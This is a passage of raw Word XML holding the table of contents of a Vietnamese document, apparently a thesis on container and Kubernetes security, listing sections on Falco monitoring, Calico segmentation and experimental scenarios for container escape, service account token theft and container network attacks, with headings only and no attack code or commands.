              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D32FCA9" w14:textId="1A2919C1"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69" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5. Giám sát hành vi độ trễ cực thấp với Falco (Động cơ eBPF)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976369 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5813D69B" w14:textId="3316AE2E"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0" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6. Vi phân mảnh mạng với Calico CNI (Chống kịch bản TN-03)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976370 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C1CD1DA" w14:textId="09BE79D1"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1" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.7.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Thử nghiệm đánh giá khoa học và hiệu năng giải pháp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976371 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48AB4DFE" w14:textId="0FAE939C"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72" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.7.1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Sơ đồ kiến trúc logic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976372 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EDBF325" w14:textId="342B168B"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73" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.7.2.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Luồng thực thi của giải pháp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976373 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="070BC589" w14:textId="23FFFF24"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4" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.8.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Kết luận c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>hương</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976374 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69A5CC3E" w14:textId="292752FA"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75" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHƯƠNG 4: THỰC NGHIỆM PHƯƠNG THỨC TẤN CÔNG VÀ giải pháp phòng vệ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976375 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18995E90" w14:textId="7829E8E9"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6" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1. Giới thiệu chương</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976376 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ECD6D57" w14:textId="786C8CFE"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7" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2. Thiết lập Môi trường Thực nghiệm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976377 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39E870D5" w14:textId="32AAF836"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78" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3. Kịch bản TN-01: Tấn công thoát chuồng (Container Escape) qua cấu hình sai Đặc quyền</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976378 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="253D6722" w14:textId="1422BE38"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79" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.1. Mục tiêu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976379 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FAA4F54" w14:textId="4979A239"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0" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.2. Điều kiện kích hoạt lỗi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976380 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03B22A67" w14:textId="77EAE8C6"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1" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.3. Quy trình thực hiện chi tiết</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976381 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65115F92" w14:textId="78BEF188"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2" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.3.4.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Kết quả thực nghiệm đạt được</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976382 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="668C600B" w14:textId="7D3B2298"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83" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4. Kịch bản TN-02: Đánh cắp Service Account Token để chiếm quyền cụm Kubernetes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976383 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="324D7770" w14:textId="1F002BA3"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4" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.1. Mục tiêu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976384 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60EBDDAD" w14:textId="09E53134"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5" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.2. Điều kiện kích hoạt lỗi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976385 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53A41575" w14:textId="070D738E"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6" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.3. Quy trình thực hiện chi tiết</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976386 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58D7FAA6" w14:textId="4605D2A6"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7" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.4. Kết quả thực nghiệm đạt được</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976387 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70B7A7A4" w14:textId="05BCB417"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88" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5. Kịch bản TN-03: Tấn công liên quan đến lớp mạng mạng nội bộ (Container Networking)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976388 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50A729A6" w14:textId="763903A8"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89" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.1. Mục tiêu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976389 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
